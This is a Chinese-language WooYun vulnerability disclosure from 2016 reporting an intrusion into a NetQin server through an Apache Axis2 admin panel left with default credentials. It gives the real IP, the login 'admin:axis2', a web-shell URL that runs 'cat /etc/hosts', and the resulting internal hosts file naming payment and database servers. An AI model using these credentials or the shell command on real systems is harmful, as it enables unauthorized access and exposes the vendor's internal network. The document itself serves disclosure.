网秦某站弱口令导致的一次内网漫游

2016年11月2日 7434点热度 0人点赞 0条评论

缺陷编号： WooYun-2016-219717

漏洞标题：网秦某站弱口令导致的一次内网漫游

漏洞作者： niliu

提交时间： 2016-06-16 07:46

公开时间： 2016-06-21 09:10

漏洞类型：成功的入侵事件

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： getshell

漏洞详情

披露状态：

2016-06-16：细节已通知厂商并且等待厂商处理中
2016-06-16：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

厂商给rank不要那么吝啬嘛 -,-

详细说明：

纯属偶遇，由Axis2的弱口令导致getshell，然后内网漫游了一下

http://211.151.59.27:80/axis2/axis2-admin/login

admin:axis2

漏洞证明：

getshell

http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts

通过hosts可以看到是网秦的服务

code 区域

HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
# HEADER: by puppet.  While it can still be managed manually, it
# HEADER: is definitely not recommended.
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1	localhost.localdomain	localhost BJ-YZ-S-ST040
::1	localhost6.localdomain6	localhost6
127.0.0.1	oversea
192.168.3.46	bjyz.puppet.nq.com
192.168.0.41	a03	pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
192.168.0.217	a12	app.netqin.com
211.151.59.71	a09	blyt.netqin.com
192.168.0.143	a08	i.netqin.com i.nq.com m.nq.com
192.168.5.212	a13	c.cpsserver.cns
192.168.0.148	a05	nqses.nq.com
192.168.3.35	a11	pay.netqin.com pay.nq.com
192.168.3.53	a07	my.netqin.com
192.168.3.52	a06	mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
192.168.5.216	a15	dbapp.nq.com
192.168.5.207	a16	dbboss.nq.com
192.168.5.218	a14	dbuis.nq.com